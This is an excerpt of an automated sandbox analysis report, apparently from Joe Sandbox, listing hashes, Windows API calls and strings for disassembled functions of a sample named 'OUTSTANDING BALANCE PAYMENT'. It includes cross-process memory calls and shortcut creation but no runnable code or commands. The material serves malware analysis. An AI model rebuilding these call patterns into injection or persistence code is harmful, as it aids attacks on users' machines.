                                                                  • Opcode ID: 76714383cd4d08fab5ad65da621ca84492bac13e349bb8902f44d0dc8942d8f5
                                                                  • Instruction ID: 033ed44d294d8441322b459b210987f4828a3fc3c7a5c6cafc6a4b1aa920f3a2
                                                                  • Opcode Fuzzy Hash: 76714383cd4d08fab5ad65da621ca84492bac13e349bb8902f44d0dc8942d8f5
                                                                  • Instruction Fuzzy Hash: 2721A135A11204AFD700EFA4D889AAEBBE9EF48301F04847AE85997351CB70AC04CB60
                                                                  APIs
                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0029AFE3
                                                                  • SelectObject.GDI32(?,00000000), ref: 0029AFF2
                                                                  • BeginPath.GDI32(?), ref: 0029B009
                                                                  • SelectObject.GDI32(?,00000000), ref: 0029B033
                                                                  Similarity
                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                  • String ID:
                                                                  • API String ID: 3225163088-0
                                                                  APIs
                                                                  • __calloc_crt.LIBCMT ref: 002A21A9
                                                                  • CreateThread.KERNEL32(?,?,002A22DF,00000000,?,?), ref: 002A21ED
                                                                  • GetLastError.KERNEL32 ref: 002A21F7
                                                                  • _free.LIBCMT ref: 002A2200
                                                                  • __dosmaperr.LIBCMT ref: 002A220B
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 2664167353-0
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002BABD7
                                                                  • GetLastError.KERNEL32(?,002BA69F,?,?,?), ref: 002BABE1
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,002BA69F,?,?,?), ref: 002BABF0
                                                                  • HeapAlloc.KERNEL32(00000000,?,002BA69F,?,?,?), ref: 002BABF7
                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002BAC0E
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7A74
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002C7A82
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002C7A8A
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002C7A94
                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32 ref: 002B9ADC
                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 002B9AF7
                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 002B9B05
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002B9B15
                                                                  • CLSIDFromString.OLE32(?,?), ref: 002B9B21
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002BAA79
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002BAA83
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002BAA92
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002BAA99
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002BAAAF
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002BAADA
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002BAAE4
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002BAAF3
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002BAAFA
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002BAB10
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 002BEC94
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 002BECAB
                                                                  • MessageBeep.USER32(00000000), ref: 002BECC3
                                                                  • KillTimer.USER32(?,0000040A), ref: 002BECDF
                                                                  • EndDialog.USER32(?,00000001), ref: 002BECF9
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  APIs
                                                                  • EndPath.GDI32(?), ref: 0029B0BA
                                                                  • StrokeAndFillPath.GDI32(?,?,002FE680,00000000,?,?,?), ref: 0029B0D6
                                                                  • SelectObject.GDI32(?,00000000), ref: 0029B0E9
                                                                  • DeleteObject.GDI32 ref: 0029B0FC
                                                                  • StrokePath.GDI32(?), ref: 0029B117
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 002CF2DA
                                                                  • CoCreateInstance.OLE32(0030DA7C,00000000,00000001,0030D8EC,?), ref: 002CF2F2
                                                                  • CoUninitialize.OLE32 ref: 002CF555
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                  • String ID: .lnk
                                                                  • API String ID: 948891078-24824748
                                                                  APIs
                                                                    • Part of subcall function 0028660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002853B1,?,?,002861FF,?,00000000,00000001,00000000), ref: 0028662F
                                                                  • CoInitialize.OLE32(00000000), ref: 002CE85D
                                                                  • CoCreateInstance.OLE32(0030DA7C,00000000,00000001,0030D8EC,?), ref: 002CE876
                                                                  • CoUninitialize.OLE32 ref: 002CE893
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                  • String ID: .lnk
                                                                  • API String ID: 2126378814-24824748
                                                                  • Opcode ID: da201c8c13842355daa132f3f3fd03cb6575396827dafd4fb41c1fe448524200
                                                                  • Instruction ID: c9980d3d5c004ba136f6454629297cee4ffd5ff15ea0f4c1328a02f6eabc96cd
                                                                  • Opcode Fuzzy Hash: da201c8c13842355daa132f3f3fd03cb6575396827dafd4fb41c1fe448524200
                                                                  • Instruction Fuzzy Hash: E6A146356143019FCB14EF14C884E6ABBE5BF88710F158A8DF9969B3A2CB31EC55CB91
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 002A32ED
                                                                    • Part of subcall function 002AE0D0: __87except.LIBCMT ref: 002AE10B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__87except__start
                                                                  • String ID: pow
                                                                  • API String ID: 2905807303-2276729525
                                                                  • Opcode ID: d1ed6cc28caefd79d62c492cd061479add676b87ab0ea11495095374eee06df6
                                                                  • Instruction ID: 5966e663bd55155c15cedac52e63c5e59d962d9ef48f0369ffeaf30220c7dfa0
                                                                  • Opcode Fuzzy Hash: d1ed6cc28caefd79d62c492cd061479add676b87ab0ea11495095374eee06df6
                                                                  • Instruction Fuzzy Hash: 72513A71A3C20397CF16BF18C94137A7B98DB43750F208DA9F8C5851A9DF748DB69A82
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0031DC50,?,0000000F,0000000C,00000016,0031DC50,?), ref: 002C4645
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002C46C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                  • String ID: REMOVE$THIS
                                                                  • API String ID: 3797816924-776492005
                                                                  • Opcode ID: 1c1315633c3941a3843b8a63f7d367d3d43dfc3a234ad6f60c2840489c1022b4
                                                                  • Instruction ID: 13eff98591c5330bae9efe0440cab012029292378a06630fef7851feb522304d
                                                                  • Opcode Fuzzy Hash: 1c1315633c3941a3843b8a63f7d367d3d43dfc3a234ad6f60c2840489c1022b4
                                                                  • Instruction Fuzzy Hash: 55416C34A2020A9FCF01EFA4C895EAEB7B5BF49304F148159E916AB292DB349D65CF50
                                                                  APIs
                                                                    • Part of subcall function 002C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002BBC08,?,?,00000034,00000800,?,00000034), ref: 002C4335
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002BC1D3
                                                                    • Part of subcall function 002C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 002C4300
                                                                    • Part of subcall function 002C422F: GetWindowThreadProcessId.USER32(?,?), ref: 002C425A
                                                                    • Part of subcall function 002C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 002C426A
                                                                    • Part of subcall function 002C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 002C4280
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002BC240
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002BC28D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: 8dc7c4a5019f7c0d4ce1e1425eed44b0c38daedad77d8ba80bc5a126dcc3fde4
                                                                  • Instruction ID: a4979c6df17987939724dcbabe84cb9a905ad933202974805f172ef0c29a599e
                                                                  • Opcode Fuzzy Hash: 8dc7c4a5019f7c0d4ce1e1425eed44b0c38daedad77d8ba80bc5a126dcc3fde4
                                                                  • Instruction Fuzzy Hash: 81413B76900218AFDB11EFA4CC92FEEB7B8AB09700F104199FA45B7181DA716E55CF61
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0031DC00,00000000,?,?,?,?), ref: 002EA6D8
                                                                  • GetWindowLongW.USER32 ref: 002EA6F5
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002EA705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: 06d9ef01cc0938d2c2e66e8b530f3b98833d9614a7986df570b481716e2ef26d
                                                                  • Instruction ID: 0f9920addd59187548746340f76696a28a1e38b27bc7d5038613fb5fedd94e61
                                                                  • Opcode Fuzzy Hash: 06d9ef01cc0938d2c2e66e8b530f3b98833d9614a7986df570b481716e2ef26d
                                                                  • Instruction Fuzzy Hash: 0E31B031151246ABDF129F79CC45BEA77A9FB49324F244725F875931E0C770F8609B90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002D5190
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 002D51C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |$D-
                                                                  • API String ID: 1413715105-3644889076
                                                                  • Opcode ID: 10dc10b660ff5080f7042c1b3dbe1a000ab86a44a45c884262003c27d0a527cf
                                                                  • Instruction ID: 21d6179a93c9c232e18ebe594a4be978ce546c3f3721adaec13876bd2fd1ffb5
                                                                  • Opcode Fuzzy Hash: 10dc10b660ff5080f7042c1b3dbe1a000ab86a44a45c884262003c27d0a527cf
                                                                  • Instruction Fuzzy Hash: 89313A75C11119ABCF01AFA4CC85AEE7FB9FF14740F104016EC05A62A6DB71AA26CF60
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002EA15E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002EA172
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 002EA196
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: d39e67f3f88b134668722c77d7ad136930d033a175c46fb5d57b34d495176c0c
                                                                  • Instruction ID: 3448d5f344df5912d72013d26ca6d7bce1a653a3c421fced6784a4b7a2d46757
                                                                  • Opcode Fuzzy Hash: d39e67f3f88b134668722c77d7ad136930d033a175c46fb5d57b34d495176c0c
                                                                  • Instruction Fuzzy Hash: CB21A132560219ABDF128F94CC82FEA3BB9EF48754F110214FE596B1D0D6B5BC61CBA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002EA941
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002EA94F
                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002EA956
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: 0335646854dcd6855a69915b38dfcd6e05262f83b12799295cd9f64088d79754
                                                                  • Instruction ID: 4e00ff19be99f764a39f00a2683e5952d9d679b2154a1434cc509343c637cedb
                                                                  • Opcode Fuzzy Hash: 0335646854dcd6855a69915b38dfcd6e05262f83b12799295cd9f64088d79754
                                                                  • Instruction Fuzzy Hash: A221B2B525020AAFDB01DF19CC91D7737ADEF5A394F450059FA049B2A2CB31FC218B61
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002E9A30
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002E9A40
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002E9A65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  • Opcode ID: b0be504700bfeb06693b0812d3a7fe8232d2c2aa17bd4bb6f23abb4d5f3ea6a6
                                                                  • Instruction ID: fef3facbfa439ee1f20f9a4ab26b63bc7d9a88f16356724c017d8b2f328455c2
                                                                  • Opcode Fuzzy Hash: b0be504700bfeb06693b0812d3a7fe8232d2c2aa17bd4bb6f23abb4d5f3ea6a6
                                                                  • Instruction Fuzzy Hash: F921D732660159BFDF128F55CC85FBB3BAEEF8A750F41812AF9445B190C671AC618BA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002EA46D
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002EA482
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002EA48F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: a6f0ffc4a659bf19bd926a8910a1106a4e4867b5eb2e54302aeb7ca7663d30d7
                                                                  • Instruction ID: d139af44200ef901042497c088354db463836a7f857a77807c9944ef69f178e3
                                                                  • Opcode Fuzzy Hash: a6f0ffc4a659bf19bd926a8910a1106a4e4867b5eb2e54302aeb7ca7663d30d7
                                                                  • Instruction Fuzzy Hash: 6511E771250249BEEF215F65CC45FAB37ADFF89754F014118FA45A60D1D6B2E821DB20
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002A2350,?), ref: 002A22A1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 002A22A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoInitialize$combase.dll
                                                                  • API String ID: 2574300362-340411864
                                                                  • Opcode ID: 0dead584dbc8c302d8c143582d05dbc5a5980549f0cc0a937be6309fb531e6e2
                                                                  • Instruction ID: 9b126dc8abf9a94770aaad55cefbfc625733e0b27d5605dfe71247d97c5d434a
                                                                  • Opcode Fuzzy Hash: 0dead584dbc8c302d8c143582d05dbc5a5980549f0cc0a937be6309fb531e6e2
                                                                  • Instruction Fuzzy Hash: 1AE04F78BA1301ABEB675FB4ED8DB5436ACBB02702F004020F642D90E0CFB85054DF04
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002A2276), ref: 002A2376
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 002A237D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 2574300362-2819208100
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: LocalTime__swprintf
                                                                  • String ID: %.3d$WIN_XPe
                                                                  • API String ID: 2070861257-2409531811
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,002E21FB,?,002E23EF), ref: 002E2213
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 002E2225
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetProcessId$kernel32.dll
                                                                  • API String ID: 2574300362-399901964
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,002842EC,?,002842AA,?), ref: 00284304
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284316
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-1355242751
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,002841BB,00284341,?,0028422F,?,002841BB,?,?,?,?,002839FE,?,00000001), ref: 00284359
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0028436B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,002C051D,?,002C05FE), ref: 002C0547
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 002C0559
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1071820185
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,002C052F,?,002C06D7), ref: 002C0572
                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002C0584
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                  • API String ID: 2574300362-1587604923
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,002DECBE,?,002DEBBB), ref: 002DECD6
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002DECE8
                                                                  Strings
